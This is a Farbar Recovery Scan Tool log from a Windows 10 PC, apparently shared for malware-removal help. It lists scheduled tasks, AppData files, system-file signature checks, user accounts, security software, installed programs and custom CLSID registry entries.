2016-10-03 14:46 - 2016-05-23 10:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DjVuLibre
2016-10-03 14:46 - 2015-05-11 11:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bullzip
2016-10-03 14:46 - 2015-03-05 18:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GnuWin32
2016-10-03 14:46 - 2009-07-14 05:37 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-10-03 14:45 - 2014-12-18 12:10 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ScenicReflections
2016-10-03 14:43 - 2016-04-20 08:36 - 00000000 ____D C:\Users\user\AppData\Local\Packages
2016-10-03 14:39 - 2016-07-16 05:22 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-10-03 14:36 - 2016-07-16 11:29 - 00000000 ___RD C:\WINDOWS\PrintDialog
2016-10-03 14:35 - 2016-07-16 11:29 - 00000000 ___RD C:\WINDOWS\MiracastView
2016-10-03 12:21 - 2015-02-02 09:39 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-10-03 12:21 - 2014-11-10 22:59 - 00008192 __RSH C:\BOOTSECT.BAK
2016-10-03 11:57 - 2015-05-15 14:44 - 00000926 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1d08f0476acbae7.job
2016-10-03 11:49 - 2015-02-06 10:36 - 00000886 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1d041dfa521745e.job
2016-10-03 11:41 - 2014-12-18 12:30 - 00000886 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-10-03 10:26 - 2016-08-30 09:10 - 00000408 _____ C:\WINDOWS\Tasks\update-sys.job
2016-10-03 09:57 - 2014-12-18 12:30 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-10-03 09:26 - 2016-08-30 09:10 - 00000408 _____ C:\WINDOWS\Tasks\update-S-1-5-21-4142771536-1505296934-324239511-1000.job
2016-10-03 08:54 - 2015-03-11 20:35 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2016-09-29 09:19 - 2014-11-12 12:30 - 00000000 ____D C:\ProgramData\Package Cache
2016-09-19 13:41 - 2014-11-10 14:42 - 00068600 _____ C:\Users\admin\AppData\Local\GDIPFONTCACHEV1.DAT
2016-09-19 12:24 - 2016-02-16 16:22 - 00000000 ____D C:\Downloads-microTorrent
2016-09-14 09:26 - 2014-11-13 14:55 - 00000000 ____D C:\Users\admin\AppData\Roaming\TeamViewer
2016-09-13 16:13 - 2014-11-13 14:55 - 00000000 ____D C:\Program Files\TeamViewer
 
==================== Files in the root of some directories =======
 
2016-08-23 09:02 - 2016-08-23 09:02 - 7065600 _____ () C:\Program Files\GUT9C32.tmp
2015-08-24 09:26 - 2015-08-24 09:26 - 6420480 _____ () C:\Program Files\GUTFA.tmp
2016-04-14 22:37 - 2016-04-14 22:37 - 0209554 _____ () C:\Users\admin\AppData\Roaming\archive_inactive_hovered.png
2015-01-06 15:30 - 2015-01-08 16:21 - 0000096 _____ () C:\Users\admin\AppData\Roaming\Camdata.ini
2015-01-06 15:30 - 2015-01-08 16:21 - 0000408 _____ () C:\Users\admin\AppData\Roaming\CamLayout.ini
2015-01-06 15:30 - 2015-01-08 16:21 - 0000408 _____ () C:\Users\admin\AppData\Roaming\CamShapes.ini
2015-01-06 15:30 - 2015-01-08 16:21 - 0004548 _____ () C:\Users\admin\AppData\Roaming\CamStudio.cfg
2015-01-06 15:56 - 2015-01-06 15:56 - 0000098 _____ () C:\Users\admin\AppData\Roaming\CamStudio.Producer.command
2015-01-06 15:57 - 2015-01-08 10:27 - 0000000 _____ () C:\Users\admin\AppData\Roaming\CamStudio.Producer.Data.ini
2015-01-06 15:57 - 2015-01-08 10:27 - 0001207 _____ () C:\Users\admin\AppData\Roaming\CamStudio.Producer.ini
2016-05-27 13:12 - 2016-06-15 13:51 - 0000040 _____ () C:\Users\admin\AppData\Roaming\cdr.ini
2015-05-18 03:49 - 2015-05-18 03:49 - 0000517 _____ () C:\Users\admin\AppData\Roaming\console.log
2013-10-02 05:56 - 2013-10-02 05:56 - 0001097 _____ () C:\Users\admin\AppData\Roaming\man.table.footnotes.divider.xml
2016-04-14 22:37 - 2016-04-14 22:37 - 0002116 _____ () C:\Users\admin\AppData\Roaming\ParadoxologyMonkHerbal
2013-10-02 05:55 - 2013-10-02 05:55 - 0003767 _____ () C:\Users\admin\AppData\Roaming\ptc.xsl
2014-05-08 07:05 - 2014-05-08 07:05 - 0000524 _____ () C:\Users\admin\AppData\Roaming\red 485 bl 1.ADO
2013-10-02 05:56 - 2013-10-02 05:56 - 0001017 _____ () C:\Users\admin\AppData\Roaming\toc.blank.image.xml
2015-01-06 15:31 - 2015-01-08 16:11 - 0000096 _____ () C:\Users\admin\AppData\Roaming\version2.xml
2014-11-12 12:09 - 2016-04-06 15:22 - 0000600 _____ () C:\Users\admin\AppData\Roaming\winscp.rnd
2016-03-24 11:07 - 2016-06-03 12:40 - 0004608 _____ () C:\Users\admin\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-11-10 14:44 - 2014-11-10 14:44 - 0001579 _____ () C:\Users\admin\AppData\Local\FastClean.20141110.134451.txt
2015-12-11 09:59 - 2016-03-31 10:43 - 0000600 _____ () C:\Users\admin\AppData\Local\PUTTY.RND
2016-08-30 09:10 - 2016-08-30 09:10 - 0000003 _____ () C:\Users\admin\AppData\Local\updater.log
2016-08-30 09:10 - 2016-08-30 09:10 - 0000412 _____ () C:\Users\admin\AppData\Local\UserProducts.xml
2014-01-28 13:02 - 2014-01-28 13:02 - 0002602 _____ () C:\ProgramData\regid.2003-04.com.aquilatech_5B6B312A-87B8-465F-BBB3-93B231EBAD06.swidtag
2016-06-27 10:58 - 2016-06-27 10:58 - 0000032 _____ () C:\ProgramData\Temp.log
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-10-03 14:31
 
==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 10-10-2016
Ran by admin (13-10-2016 12:04:23)
Running from C:\Users\admin\Downloads
Microsoft Windows 10 Pro Version 1607 (X86) (2016-10-03 12:26:28)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
admin (S-1-5-21-4142771536-1505296934-324239511-1000 - Administrator - Enabled) => C:\Users\admin
Administrator (S-1-5-21-4142771536-1505296934-324239511-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-4142771536-1505296934-324239511-503 - Limited - Disabled)
Guest (S-1-5-21-4142771536-1505296934-324239511-501 - Limited - Disabled)
user (S-1-5-21-4142771536-1505296934-324239511-1001 - Limited - Enabled) => C:\Users\user
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: ESET Smart Security 9.0.402.0 (Enabled - Up to date) {EC1D6F37-E411-475A-DF50-12FF7FE4AC70}
AS: ESET Smart Security 9.0.402.0 (Enabled - Up to date) {577C8ED3-C22B-48D4-E5E0-298D0463E6CD}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: ESET Personal firewall (Enabled) {D426EE12-AE7E-4602-F40F-BBCA8137EB0B}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\uTorrent) (Version: 3.4.9.42606 - BitTorrent Inc.)
7-Zip 9.38 beta (HKLM\...\7-Zip) (Version:  - )
Acer Crystal Eye Webcam (HKLM\...\InstallShield_{A0382E3C-7384-429A-9BFA-AF5888E5A193}) (Version: 1.5.2904.00 - CyberLink Corp.)
Acer Crystal Eye Webcam (Version: 1.5.2904.00 - CyberLink Corp.) Hidden
Acer ePower Management (HKLM\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 6.00.3006 - Acer Incorporated)
ActiveState ActiveTcl 8.6.4.1 (HKLM\...\ActiveTcl 8.6.4.1) (Version: 8.6.4.1 - ActiveState Software Inc.)
Adobe Acrobat Reader DC (HKLM\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.017.20053 - Adobe Systems Incorporated)
Aegisub 3.2.2 (HKLM\...\{24BC8B57-716C-444F-B46B-A3349B9164C5}_is1) (Version: 3.2.2 - Aegisub Team)
AnyBurn (HKLM\...\AnyBurn) (Version: 3.4 - Power Software Ltd)
Avidemux 2.6 - 32 bits (32-bit) (HKLM\...\Avidemux 2.6 - 32 bits) (Version: 2.6.14.160917 - )
Bandicam (HKLM\...\Bandicam) (Version: 3.0.0.997 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM\...\BandiMPEG1) (Version:  - Bandisoft.com)
Bullzip PDF Printer 10.11.0.2338 (HKLM\...\Bullzip PDF Printer_is1) (Version: 10.11.0.2338 - Bullzip)
CamStudio 2.7.2 (HKLM\...\{04B83666-3A62-452B-85D3-70F8117F2329}_is1) (Version: 2.7.2 - CamStudio Open Source)
CamStudio Lossless Codec v1.5 (HKLM\...\camcodec) (Version: 1.5 - CamStudio)
Canon iP4300 (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_iP4300) (Version:  - )
Citrix Online Launcher (HKLM\...\{678753E6-E526-4AE5-A144-00240772543A}) (Version: 1.0.393 - Citrix)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6514.5001 - Microsoft Corporation)
Convert AVI to MP4 (HKLM\...\{9ECE13D2-C028-44CB-8A96-A65196E7BBE7}_is1) (Version:  - convertavitomp4.com)
Cult3D ActiveX Player (HKLM\...\Cult3D ActiveX Player) (Version:  - )
CuneiForm OpenOCR (HKLM\...\{2C695618-6950-4C88-B836-A4FE7DD7FC9F}) (Version: 01.08.1006 - Cognitive Technologies)
Debut Video Capture Software (HKLM\...\Debut) (Version: 3.01 - NCH Software)
Digi Net Mobile (HKLM\...\Digi Net Mobile) (Version: 21.005.15.00.623 - Huawei Technologies Co.,Ltd)
Disable Autorun (HKLM\...\{53A1CC4F-5332-442B-B9E2-0F57C254B818}_is1) (Version:  - www.disableautorun.com)
DjVuLibre DjView  3.5.27+4.10.4 (HKLM\...\DjVuLibre+DjView) (Version: 3.5.27+4.10.4 - DjVuZone)
Doublekiller Pro v2.1.0.104 (HKLM\...\Doublekiller Pro_is1) (Version:  - )
EaseUS Partition Master 10.8 Trial Edition (HKLM\...\EaseUS Partition Master Trial Edition_is1) (Version:  - EaseUS)
EDU Stiinte ale naturii 3 (HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\EDU Stiinte ale naturii 3) (Version: 001.00.00.00 - Editura EDU)
ESET Smart Security (HKLM\...\{2708E743-745F-41CE-BA53-AE3095CFF411}) (Version: 9.0.386.0 - ESET, spol. s r.o.)
FileSeek 4.5 (HKLM\...\44953928-E730-4e8c-A2B2-3A85BC96A3D0_is1) (Version: 4.5.0.0 - Binary Fortress Software)
Free Alarm Clock (HKLM\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 4.0.1.0 - Comfort Software Group)
Free CD to MP3 Converter (HKLM\...\Free CD to MP3 Converter) (Version:  - )
Free Studio version 6.4.3.128 (HKLM\...\Free Studio_is1) (Version: 6.4.3.128 - DVDVideoSoft Ltd.)
Free Video Joiner (HKLM\...\{14FA6DD9-92ED-493D-A937-81A78870E08A}_is1) (Version:  - FreeVideoJoiner.com)
FreeOCR v5.4 (HKLM\...\freeocr_is1) (Version:  - )
FXCC - MetaTrader 4 (HKLM\...\FXCC - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
FXCM MetaTrader 4 (HKLM\...\FXCM MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Genius Scanner (HKLM\...\{CCEB2144-5F5D-49E8-AADC-05CA48AE9AA5}) (Version: Version 1.4 - )
GnuWin32: Wget-1.11.4-1 (HKLM\...\Wget-1.11.4-1_is1) (Version: 1.11.4-1 - GnuWin32)
GoodSync (HKLM\...\{B26B00DA-2E5D-4CF2-83C5-911198C0F009}) (Version: 9.9.16.9 - Siber Systems)
Google Chrome (HKLM\...\Google Chrome) (Version: 53.0.2785.143 - Google Inc.)
Google Drive (HKLM\...\{459CE109-4E46-4340-92BC-054642BC3BC2}) (Version: 1.31.2873.2758 - Google, Inc.)
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.31.5 - Google Inc.) Hidden
GoToMeeting 7.24.0.5636 (HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\GoToMeeting) (Version: 7.24.0.5636 - CitrixOnline)
GPL Ghostscript (HKLM\...\GPL Ghostscript 9.09) (Version: 9.09 - Artifex Software Inc.)
GPL Ghostscript Lite 9.14.17 (HKLM\...\GPL Ghostscript Lite_is1) (Version:  - Free Distribution)
IC Markets cTrader (HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\d877e0b2b4793e58) (Version: 1.30.58489.34635 - IC Markets cTrader)
Intel® Management Engine Components (HKLM\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Processor Graphics (HKLM\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2418 - Intel Corporation)
IrfanView (remove only) (HKLM\...\IrfanView) (Version: 4.38 - Irfan Skiljan)
Java 2 Runtime Environment, SE v1.4.2_12 (HKLM\...\{7148F0A8-6813-11D6-A77B-00B0D0142120}) (Version: 1.4.2_12 - Sun Microsystems, Inc.)
Kolor Autopano Giga 4.0 (HKLM\...\AutopanoGiga4.0) (Version: V4.0.1 - Kolor)
Launch Manager (HKLM\...\LManager) (Version: 6.0.5 - Acer Inc.)
Lexmark Local Printer Settings Utility Uninstaller (HKLM\...\Lexmark Local Printer Settings Utility) (Version:  - Lexmark International, Inc.)
Lexmark Software Uninstall (HKLM\...\Lexmark_HostCD) (Version:  - Lexmark International, Inc.)
Lightshot-5.4.0.1 (HKLM\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.4.0.1 - Skillbrains)
Livestream Producer (HKLM\...\{CAB3390A-BAF0-4F8B-B40F-6DDDF963F719}) (Version: 1.0.19 - Livestream)
MagicDisc 2.7.106 (HKLM\...\MagicDisc 2.7.106) (Version:  - )
MetaTrader 4 Admiral Markets AS (HKLM\...\MetaTrader 4 Admiral Markets AS) (Version: 4.00 - MetaQuotes Software Corp.)
MetaTrader 4 FinFX (HKLM\...\MetaTrader 4 FinFX) (Version: 4.00 - MetaQuotes Software Corp.)
MetaTrader 4 IC Markets (HKLM\...\MetaTrader 4 IC Markets) (Version: 6.00 - MetaQuotes Software Corp.)
MetaTrader 5 (HKLM\...\MetaTrader 5) (Version: 5.00 - MetaQuotes Software Corp.)
MetaTrader FIX (HKLM\...\MetaTrader FIX) (Version: 4.00 - MetaQuotes Software Corp.)
MetaTrader-Admiral Markets (HKLM\...\MetaTrader-Admiral Markets) (Version: 5.00 - MetaQuotes Software Corp.)
Microsoft LifeCam (HKLM\...\{BD71B413-9FEE-49BB-A6D1-2C0BFB99BDFE}) (Version: 3.60.253.0 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6425.1000 - Microsoft Corporation)
Microsoft Office Professional Edition 2003 (HKLM\...\{90110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
MKVToolNix 9.4.2 (32bit) (HKLM\...\MKVToolNix) (Version: 9.4.2 - Moritz Bunkus)
Mobile Partner (HKLM\...\Mobile Partner) (Version: 21.005.22.00.03 - Huawei Technologies Co.,Ltd)
Mouse Suite (HKLM\...\MouseSuite98) (Version:  - )
Mozilla Firefox 47.0.1 (x86 en-US) (HKLM\...\Mozilla Firefox 47.0.1 (x86 en-US)) (Version: 47.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla)
MP4Tools v3.4 (HKLM\...\MP4Tools_is1) (Version:  - Thüring IT-Consulting)
MWSnap 3 (HKLM\...\MWSnap 3) (Version: 3.0.0.74 - Mirek Wojtowicz)
NetBeans IDE 8.0.1 (HKLM\...\nbi-nb-base-8.0.1.0.201408251540) (Version: 8.0.1 - NetBeans.org)
OBS Studio (HKLM\...\OBS Studio) (Version: 0.16.0 - OBS Project)
Partition Bad Disk version 3.3.2 (HKLM\...\{CCAA63AC-AC48-4338-AA0A-B1FDA3EEA202}_is1) (Version: 3.3.2 - Goodlucksoft)
PDF Converter Elite 4.0 (HKLM\...\{51807840-3627-4016-B579-A32D54097837}_is1) (Version: 4.0 - PDFConverter.com)
PDF Power Tool 3.0.0.9 (HKLM\...\PDF Power Tool_is1) (Version: 3.0.0.9 - pdfpowertool.com)
PDF-Viewer (HKLM\...\{A278382D-4F1B-4D47-9885-8523F7261E8D}_is1) (Version: 2.5.317.1 - Tracker Software Products Ltd)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6392 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30127 - Realtek Semiconductor Corp.)
Remove Empty Directories version 2.2 (HKLM\...\{06F25DC8-71E2-44E2-805A-F15E15B51C74}_is1) (Version: 2.2 - Jonas John)
Skype™ 7.0 (HKLM\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
SmoothboardAir (HKLM\...\SmoothboardAir) (Version:  - )
SopCast 4.2.0 (HKLM\...\SopCast) (Version: 4.2.0 - www.sopcast.com)
Subtitle Edit 3.4.4 (HKLM\...\SubtitleEdit_is1) (Version: 3.4.4.0 - Nikse)
TeamViewer 11 (HKLM\...\TeamViewer) (Version: 11.0.65452 - TeamViewer)
Ultimate Christmas Scenic Reflections (HKLM\...\Ultimate Christmas Scenic Reflections) (Version:  - ScenicReflections.com)
USBPcap 1.1.0.0-g794bf26 (HKLM\...\USBPcap) (Version:  - )
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WakeOnLAN version 2.11.4.0 (HKLM\...\{05DF342B-3E1A-4862-9E67-8E7E9839D3EC}_is1) (Version: 2.11.4.0 - Aquila Technology)
Whiteboard V3.0.150611 (HKLM\...\Whiteboard) (Version: V3.0.150611 - Whiteboard)
WinDirStat 1.1.2 (HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\WinDirStat) (Version:  - )
Windows 7 USB/DVD Download Tool (HKLM\...\{CCF298AF-9CE1-4B26-B251-486E98A34789}) (Version: 1.0.30 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM\...\Windows Media Encoder 9) (Version:  - )
WinFF 1.5.4 (Codename EMMA) (HKLM\...\WinFF_is1) (Version:  - WinFF.org)
WinISO 5.3 (HKLM\...\WinISO_is1) (Version:  - WinISO Computing Inc.)
WinPcap 4.1.3 (HKLM\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.11 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
WinSCP 5.5.6 (HKLM\...\winscp3_is1) (Version: 5.5.6 - Martin Prikryl)
Wireshark 2.0.1 (32-bit) (HKLM\...\Wireshark) (Version: 2.0.1 - The Wireshark developer community, hxxps://www.wireshark.org)
WOL Magic Packet Sender (HKLM\...\{E268ADBD-A002-4684-AEDF-EA0F83F7E00B}) (Version: 1.5.0 - Zwalisoft)
WOLAgent (HKLM\...\{9A781D0A-AB4D-47FD-B963-732B21F800D7}) (Version: 1.00.0000 - Aquila Technology)
x264vfw - H.264/MPEG-4 AVC codec (remove only) (HKLM\...\x264vfw) (Version:  - )
Xpdf Lite 3.3.4 (HKLM\...\Xpdf Lite_is1) (Version:  - Free Distributions)
Xvid Video Codec (HKLM\...\Xvid Video Codec 1.3.3) (Version: 1.3.3 - Xvid Team)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{0037AC54-E32B-4ACA-9864-09F869AA82FE}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{004B49B7-11B9-5058-FF22-08DD093ADC4B}\InprocServer32 -> {1F02685E-9468-D082-08F8-73EE85889A47} => No File
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{00BB2763-6A77-11D0-A535-00C04FD7D062}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{03C036F1-A186-11D0-824A-00AA005B4383}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{060AF76C-68DD-11D0-8FC1-00C04FD9189D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{08244EE6-92F0-47F2-9FC9-929BAA2E7235}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{0AF10CEC-2ECD-4B92-9581-34F6AE0637F3}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{0B91A74B-AD7C-4A9D-B563-29EEF9167172}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{0C15D503-D017-47CE-9016-7B3F978721CC}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{104846AB-42B1-4E38-A80D-136F78C3F258}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{12594540-9B58-4FE9-A7EA-8A10F641B049}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{14074E0B-7216-4862-96E6-53CADA442A56}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1643E180-90F5-11CE-97D5-00AA0055595A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1685D4AB-A51B-4AF1-A4E5-CEE87002431D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{171252A0-8820-4AFE-9DF8-5C92B2D66B04}\InprocServer32 -> C:\Program Files\Free Codec Pack\LAVFilters\LAVSplitter.ax (1f0.de - Hendrik Leppkes)
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{17CCA71B-ECD7-11D0-B908-00A0C9223196}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{18907F3B-9AFB-4F87-B764-F9A4E16A21B8}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1B544C20-FD0B-11CE-8C63-00AA0044B51E}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1C0F439D-7C29-4BDE-8952-4EEB6A49E048}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1C1800C1-3258-44C2-BE80-3DEADB6C5E39}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1DA08500-9EDC-11CF-BC10-00AA00AC74F6}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1E651CC0-B199-11D0-8212-00C04FC32C45}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1F1F4E1A-2252-4063-84BB-EEE75F8856D5}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{247161C5-995C-4097-9FF4-655DC6D12DB5}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{280A3020-86CF-11D1-ABE6-00A0C905F375}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{30276B4F-F25C-457C-A4B7-08574F8EA528}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{33156164-81D6-11D3-8006-00C04FA30A73}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{33156168-81D6-11D3-8006-00C04FA30A73}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{336475D0-942A-11CE-A870-00AA002FEAB5}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{33FACFE0-A9BE-11D0-A520-00A0D10129C0}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{35786D3C-B075-49B9-88DD-029876E11C01}\InprocServer32 -> no filepath
